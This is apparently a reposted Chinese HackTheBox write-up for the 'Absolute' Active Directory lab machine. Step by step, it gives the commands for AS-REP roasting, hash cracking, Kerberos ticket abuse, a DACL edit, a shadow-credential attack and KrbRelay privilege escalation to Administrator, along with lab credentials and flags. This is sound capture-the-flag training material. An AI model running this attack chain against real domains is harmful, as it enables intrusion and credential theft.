一、信息搜集
题目提示如下:
Absolute is an Insane Windows Active Directory machine that starts with a webpage displaying some images, whose metadata is used to create a wordlist of possible usernames that may exist on the machine. It turns out that one of these users doesn't require Pre-authentication, therefore posing a valuable target for an `ASREP` roast attack. The discovered credentials are then used to enumerate `LDAP` and discover credentials for the user `svc_smb`, who has access to an `SMB` share containing a Windows binary. Performing dynamic analysis on the binary reveals that it tries to perform an `LDAP` connection to the Domain Controller with clear text credentials for the `m.lovegod` user, who owns the `Network Audit` group, which in turn has `Generic Write` over the `winrm_user`. Following this attack path and performing a shadow credential attack on the `winrm_user`, one can then `WinRM` and access the machine. Finally, the `KrbRelay` tool is used to add the `winrm_user` user to the Administrators group, leading to fully elevated privileges.
nmap -sT -Pn 10.10.11.181
看到开放了
389
和53
两个端口,说明这台Windows
机子很大概率上是一台域控。 继续用nmap
探测端口的详细信息:
sudo nmap -sCV -Pn -p 53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.11.181
扫描结果如下:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 06:55 EDT
Nmap scan report for 10.10.11.181
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-15 17:55:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-15T17:56:50+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-15T17:56:51+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-15T17:56:50+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2023-07-17T21:11:52
|_Not valid after: 2024-07-16T21:11:52
|_ssl-date: 2023-09-15T17:56:51+00:00; +7h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-15T17:56:41
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.45 seconds
可以看到目标主机上是IIS10.0
,也就是说目标主机至少是win10
或winserver2016
及以上的。并且从上面的扫描结果中还可以看到对应的CN
为dc.absolute.htb
。 我们可以在我们本地修改hosts
文件,添加如下内容:
10.10.11.181 absolute.htb dc.absolute.htb
1.1 445端口smb
由于我们不知道共享名,于是尝试爆破:
crackmapexec smb 10.10.11.181 --shares
枚举失败:尝试匿名登录:
crackmapexec smb 10.10.11.181 --shares -u hacker -p ""
失败:不过此时我们也知道这是一台
win10
的机器。
1.2 389端口ldap
先获取基础的naming context
,这里的-x
参数表示使用简单身份验证方式来进行连接(也就是明文传输账号密码;-s
参数指定搜索范围,这里的base
表示基准dn
本身。):
ldapsearch -H ldap://dc.absolute.htb -x -s base namingcontexts
拿到
DC=absolute,DC=htb
,再进一步获取:
ldapsearch -H ldap://dc.absolute.htb -x -b "DC=absolute,DC=htb"
这里的-b "DC=absolute,DC=htb"
指定了要搜索的基准DN
,DC=absolute,DC=htb
表示从位于absolute.htb
域根目录下开始搜索。 但是发现需要登录,于是放弃:
1.3 53端口dns
尝试查询域名解析记录:
dig +nocmd +noall +answer @10.10.11.181 AXFR absolute.htb
失败:尝试爆破子域名:
sudo apt install seclists
dnsenum --dnsserver 10.10.11.181 -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt absolute.htb
新发现几个域名,但是没什么用:
1.4 80端口web
确实用的是
IIS
,但是报错页面进行了设置,并不会显示细节。尝试爆破目录:
gobuster dir -u "http://absolute.htb" -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt -b 301,302,400,401,403,404,500,502 -t 20 --timeout 30s --random-agent --no-error
也可以使用:
feroxbuster -u http://absolute.htb
扫了半天,没发现有用的东西。 根据题目提示,查看网站图片的exif
信息:这其中有用的信息应该就是人名了。于是尝试使用以下命令搜集这个网站的背景图片中的人名信息:
for i in $(seq 1 6); do wget http://10.10.11.181/images/hero_${i}.jpg; done | for i in $(seq 1 6); do exiftool hero_${i}.jpg | grep Author | awk '{print $3 " " $4}'; done | tee users
我这里执行很卡:于是我采用下面的方式:
for i in $(seq 1 6); do echo "http://10.10.11.181/images/hero_${i}.jpg" >> image_urls.txt; done
这里我们可以下载个
Linux
下很好用的文件下载工具FreeDownloadManager
并安装:
https://files2.freedownloadmanager.org/6/latest/freedownloadmanager.deb
sudo apt install ffmpeg
sudo dpkg -i freedownloadmanager.deb
然后从文本中读取url
批量下载:尼玛网络环境问题太让人抓狂了:
算了,还是一张张单击右键保存吧:
然后批量提取作者名字:
for i in $(seq 1 6); do exiftool hero_${i}.jpg | grep Author | awk '{print $3 " " $4}'; done | tee users
这里使用
username-anarchy
工具来帮助我们生成一个自定义字典
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy -i ../users | tee usernames
这样一份用户名字典就生成到当前文件夹下了。 然后我们就可以和之前打靶一样,使用
kerbrute
来测试用户名是否有效:
./kerbrute_linux_amd64 userenum --dc dc.absolute.htb -d absolute.htb ./htb_absolute/username-anarchy/usernames
发现六个有效的用户名,从中也可以看出起常用的命名规则:
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
但是此时我们仍然没有用户名对应的密码,无法进一步利用。根据题目提示,我们可以尝试AS-Rep-Roast
攻击。
二、AS-Rep-Roast在内网横向中的利用
网上的学习文章较多,例如:https://www.freebuf.com/articles/web/291783.html和https://www.cnblogs.com/nice0e3/p/15784113.html,可自行搜索学习。 由于rubeus
需要去https://github.com/GhostPack/Rubeus下载源码自行编译,因此这里我们可以使用impacket
套件中的GetNPUsers.py
脚本来获取hash
: 先把上面获取到的有效用户名保存到valid_users.txt
中:然后执行:
impacket-GetNPUsers -dc-ip dc.absolute.htb -usersfile valid_users.txt absolute.htb/
发现
[email protected]
用户存在漏洞,hash
为:[email protected]@ABSOLUTE.HTB:749d49ae9c3f9400857844e846af1826$d0d93969b3c1ba12acb1dd2553a1757d1c72722fd67f774ff9b280edcef2be7159034e36b855d3baca3b653dfc1c643d27175a9edfec68585a63cb8f7a21596e6e2b35c70bc9b829a0f08e5af433f0b5e20568cc99963deb1a87f55b922ebf8eff4132558c8bb48ce8b34237f194c3e4e79fa26f08783f9418ef7aa6b26e500fddd5d7b9147118d2f16c6e8f2a18c3e53ca93a3710e958c96072e33946a014e70d4db65be6fce26868c98e1589cd0a5936afbf1005f1587a16ecffe0f4c53cec366fc6963d595379a3d043ebcb4896b2f397feafadd4b764497f9c40a37db301c68ec577a50362b2b13362b4
。 我们把它保存到d_klay_hash.txt
中,然后使用hashcat
来破解:
hashcat d_klay_hash.txt /usr/share/wordlists/rockyou.txt
需要注意的是,这里貌似要把内存调大一点,不能像我一样只给2GB
,否则hashcat
无法破解,直接结束进程。 或者使用john
:
john --wordlist=/usr/share/wordlists/rockyou.txt d_klay_hash.txt
几秒就破解好了:破解得到的密码是
Darkmoonsky248girl
。 拿去验证:
crackmapexec smb 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl'
还是失败:但是这次的失败原因是
STATUS_ACCOUNT_RESTRICTION
(参考https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/639c2244-b6d5-4ca3-8ca0-74fe787cbae6),意思是NTLM
被禁止了,那么就需要尝试利用Kerberos
协议。
三、利用kerberos协议枚举smb
3.1 申请TGT
首先需要同步时钟,因为kerberos是使用时间戳来生成票据的,并且通过比对时间戳来验证票据的合法性:
sudo apt install ntpdate
sudo ntpdate 10.10.11.181
然后使用
impacket
套件中的脚本来生成TGT
:
impacket-getTGT absolute.htb/d.klay:'Darkmoonsky248girl' -dc-ip 10.10.11.181
export KRB5CCNAME=d.klay.ccache
然后我们可以使用
klist
这个工具来查看票据的有效期:可以看到是
4
个小时,但是正常应该是10
小时,有点奇怪,先放着。
3.2 连接SMB
然后使用crackmapexec
获取其SMB
信息:
crackmapexec smb dc.absolute.htb -u d.klay -p 'Darkmoonsky248girl' --shares -k
但是很搞的是,除了名为
Shared
这个共享,其他共享全是默认共享,但是这个Shared
共享没有读的权限,6。 那就尝试用smbclient
连:
impacket-smbclient 'absolute.htb/d.klay:[email protected]' -k -no-pass
翻了一圈,还是没东西:
这时突然想起来之前的
Shared
共享,尝试使用,发现没权限:于是尝试从别的地方寻找其他用户。
3.3 ldap再利用
再次探测之前的ldap
服务:
crackmapexec ldap absolute.htb -u d.klay -p 'Darkmoonsky248girl' -k --users
发现一个新账号:
svc_smb/AbsoluteSMBService123!
,试试看这个权限够不够:
sudo ntpdate 10.10.11.181
impacket-getTGT absolute.htb/svc_smb:'AbsoluteSMBService123!' -dc-ip 10.10.11.181
export KRB5CCNAME=svc_smb.ccache
klist
crackmapexec smb absolute.htb -u svc_smb -p 'AbsoluteSMBService123!' -k --shares
发现这个用户是有读Shared
权限的:
impacket-smbclient 'absolute.htb/svc_smb:[email protected]' -k -no-pass
发现有一个脚本和一个
exe
文件。我们把它们下载下来:
get compiler.sh
get test.exe
查看编译脚本内容:没什么用。 对于这个
test.exe
,有两个思路,一个是反编译(但是我不会),另一个就是wireshark
抓流量。
3.4 wireshark分析exe文件流量
wireshark
下载地址:https://2.na.dl.wireshark.org/win64/Wireshark-win64-4.0.8.exeWindows
版openvpn
地址:https://swupdate.openvpn.org/community/releases/OpenVPN-2.6.6-I001-amd64.msi然后本地装clash
,开启tun
网卡模式:然后这里选择抓取
clash
网卡的数据包: 然后本地运行这个test.exe
,为了方便看我们可以用wireshark
语句ip.addr==10.10.11.181
来过滤:从上面左侧可以看到一个新用户,并且可以确定这个
test.exe
实际上是用来测试ldap
绑定的。 新用户的账号密码分别为:absolute.htbmlovegod
;AbsoluteLDAP2022!
为什么是明文传输呢?因为下图中的这个设置项它设置的应该是None
。我们来验证下账号密码是否正确,需要注意的是,这里的用户名如果使用
mlovegod
是不对的,需要根据前面收集到的来相应地变形:
sudo ntpdate dc.absolute.htb
crackmapexec smb 10.10.11.181 -u m.lovegod -p 'AbsoluteLDAP2022!' -k
验证成功:但是这个用户也枚举不出什么新的分享名了。
四、BloodHound-kerbros
首先利用改动后的支持kerbros
协议的python-bloodhound
脚本(因为这个靶机中NTLM
被禁用了):
git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos
cd BloodHound.py-Kerberos
然后申请TGT
:
sudo ntpdate dc.absolute.htb
impacket-getTGT absolute.htb/m.lovegod:'AbsoluteLDAP2022!' -dc-ip 10.10.11.181
export KRB5CCNAME=m.lovegod.ccache
klist
然后利用脚本生成一个
.zip
文件:
python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 --dns-tcp --zip -no-pass -c All
然后启动
bloodhound
:
sudo apt install neo4j
sudo apt install bloodhound
sudo neo4j start
bloodhound --no-sandbox
初始化neo4j
数据库,并设置新密码:登录
bloodhound
:导入刚才的压缩包:
我们可以先调出一个域内的用户:
按照如下箭头操作即可看到这里有个
PROTECTED USERS
:我们点击
Direct Members
即可看到这些域内的用户:整体展示如下:
如果你的下面没有对应的名字,说明被隐藏了,得去设置里面打开:
而这个
PROTECTED USERS
也就正好解释了为什么这些用户无法用于NTLM
登录,因为Protected Users
组自动应用无法配置的保护措施,以最大限度地减少域内的凭据暴露,这些保护措施主要有以下几项:
-
禁用NTLM身份验证 -
缩短 Kerberos
票证有效期(这就解释了为什么我们的票据只有4
小时有效期而不是10
小时) -
强制使用强加密算法,如 AES
-
阻止工作站上的密码缓存 -
阻止任何类型的 Kerberos
委派
然后我们把m.lovegod
标记为我们已拥有的:然后依次点击:
而这个
REMOTE MANAGEMENT USERS
则意味着其中的用户可以有权限通过WinRM
登录。 而我们目前的用户虽然拥有m.lovegod
这个用户,但并不意味着我们有Network Audit
这个组的访问权限,我们需要把这个用户加进去,然后就可以有权限生成shadow credential
了。 关于shadow credential
,可以参考这篇文章:https://blog.csdn.net/qq_41874930/article/details/119637917。
五、添加用户至NetworkAudit并进行shadow credential利用
具体操作方法如下,这里我们只讨论在kali
中的攻击方法,主要是这网络环境实在是太差了,在我Windows
上利用起来很难受: 这里我们可以配置一下另一个impacket:
git clone https://github.com/ThePorgs/impacket.git impacket-dacl
cd impacket-dacl
pip install .
sudo ntpdate dc.absolute.htb
impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip dc.absolute.htb
export KRB5CCNAME=m.lovegod.ccache
klist
kinit m.lovegod
python /home/kali/Desktop/impacket-dacl/examples/dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
impacket-dacledit
是一个用于修改Windows
域控制器的访问控制列表(ACL
)的命令行工具。-k
参数指定了连接到目标域控制器的凭据;-principal
参数指定要操作的对象,这里是m.lovegod
,表示将要修改该用户在目标域中的ACL
;-target
参数指定了要修改的目标资源;-action
参数指定了执行什么操作,这里是write
,表示将要对该资源进行写入操作;-rights
参数指定了要设置哪些权限。
sudo apt install samba
net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' -k -S dc.absolute.htb
net rpc group members "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb
此时会出现一些蛋疼的问题: 问题1:解决办法:
kinit m.lovegod
问题2:解决办法: 这里需要我们修改
dns
以及kbr5.conf
文件:
nameserver 10.10.11.181
#nameserver 192.168.52.2
sudo mv /etc/krb5.conf /etc/krb5.conf.bak
sudo nano /etc/krb5.conf
输入以下内容:
[libdefaults]
default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = dc.absolute.htb
admin_server = dc.absolute.htb
default_domain = absolute.htb
}
[domain_realm]
.absolute.htb = ABSOLUTE.HTB
absolute.htb = ABSOLUTE.HTB
再执行命令:
net rpc group addmem "Network Audit" m.lovegod -U 'm.lovegod' -k -S dc.absolute.htb
net rpc group members "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb
问题3:
解决办法:
python /home/kali/Desktop/impacket-dacl/examples/dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
基本上就是这些问题,其他的超时/连接重置这种问题直接检查网络、反复执行命令(我反复执行了四十几次)就行。 接下来需要重新生成TGT
:
rm m.lovegod.ccache
sudo ntpdate dc.absolute.htb
impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip dc.absolute.htb
export KRB5CCNAME=m.lovegod.ccache
然后如果之前执行了修改dns的操作的话,这一步需要恢复原样,也就是注释掉10.10.11.181
那行:
pip install certipy-ad
certipy shadow auto -k -no-pass -u absolute.htb/[email protected] -dc-ip 10.10.11.181 -target dc.absolute.htb -account winrm_user
实际安装过程中,可能会这样提示:那
certipy
的地址就是:
/home/kali/.local/bin/certipy
成功拿到
hash
:8738c7413a5da3bc1d083efc0ab06cb2
。 配置新的环境变量并用evil-winrm
连接:
KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb
拿到user
的flag
:
cat C:Userswinrm_userDesktopuser.txt
六、KrbRelay
一些参考资料:https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html、https://github.com/cube0x0/KrbRelay、https://github.com/Dec0ne/KrbRelayUp
6.1 利用前提
-
没有 2022
年10
月的补丁 -
LDAP
签名必须禁用(但是Windows
默认是禁用的)
This MS patch also effects krbrelay. It looks like we had our fun with rpc->ldap https://t.co/lAWJltswBg
— Cube0x0 (@cube0x0) October 21, 2022
6.2 检查LDAP签名
crackmapexec
理论上可以检查LDAP
签名的有效性的,但是这个靶场实际操作会失败:
crackmapexec ldap 10.10.11.181 -u m.lovegod -p 'AbsoluteLDAP2022!' -M ldap-checker -k
我这里图方便直接下载了这工具集合:
git clone https://github.com/Maxvol20/SharpCollection
cd SharpCollection/NetFramework_4.7_any
cp KrbRelay.exe ~/Desktop/htb_absolute
下载RunasCs
:https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip也复制过来:然后在
evil-winrm
那里上传:
upload KrbRelay.exe
upload RunasCs.exe
上传成功:
.RunasCs.exe winrm_user -l 9 -d absolute.htb AbsoluteLDAP2022! 'KrbRelay.exe -spn ldap/dc.absolute.htb -Port 10 -clsid 8F5DF053-3013-4dd8--B5F4-88214E81C0CF -add-groupmember "Administrators" winrm_user'
然后输入exit
退出,重新登录验证发现已经在Administrators
组中:
cat C:UsersAdministratorDesktoproot.txt
# d430b99dd825b71ef247f75bdd6217f4
七、另一种解法:KrbRelayUp+Rubeus+DC sync
由于写文章的时候靶机已关闭,准备打下一个靶机了,而且这文章的作者对于这一部分的内容写的还算清晰,于是直接贴出来:https://fdlucifer.github.io/2023/05/29/htb-absolute/#KrbRelayUp以及另一个大佬的文章:https://rootjaxk.github.io/posts/absolute/#privesc
八、后记
8.1 KrbRelay与KrbRelayUp
学习文章:https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.htmlhttps://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.htmlhttps://github.com/cube0x0/KrbRelayhttps://github.com/ShorSec/KrbRelayUphttps://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9攻击后检测:https://github.com/tsale/Sigma_rules/blob/main/windows_exploitation/KrbRelayUp.ymlhttps://twitter.com/SBousseaden/status/1518976397364056071
8.2 LDAP或LDAPS利用
利用手法总结文章:https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/ldap-ldaps.md查看工具:http://jxplorer.org/
8.3 ACL
利用手法总结文章:https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/acl-abuse.mdhttps://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse学习文章:https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aceshttps://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/https://www.thehacker.recipes/active-directory-domain-services/movement/access-control-entries#exploitation-pathshttps://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/利用工具:https://github.com/garrettfoster13/aced
8.4 DCsync
利用手法总结文章:https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/credential-harvesting/dcsync.md学习文章:https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsynchttps://habr.com/ru/company/rvision/blog/709866/https://habr.com/ru/company/rvision/blog/709942/
8.5 AS-Rep Roasting
学习文章:https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcathttps://blog.xpnsec.com/kerberos-attacks-part-2/https://www.freebuf.com/articles/web/291783.htmlhttps://blog.csdn.net/shuteer_xu/article/details/106066628https://www.cnblogs.com/nice0e3/p/15784113.html
8.6 Shadow Credential
学习文章:https://blog.csdn.net/qq_41874930/article/details/119637917https://pentestlab.blog/2022/02/07/shadow-credentials/https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/https://www.thehacker.recipes/active-directory-domain-services/movement/access-control-entries/shadow-credentialshttps://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab利用工具:https://github.com/ShutdownRepo/pywhisker
原文始发于微信公众号(追梦信安):【HackTheBox系列】第四篇:疯狂难度之Absolute(AS-REP、LDAP利用、KrbRelay、ACL等)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论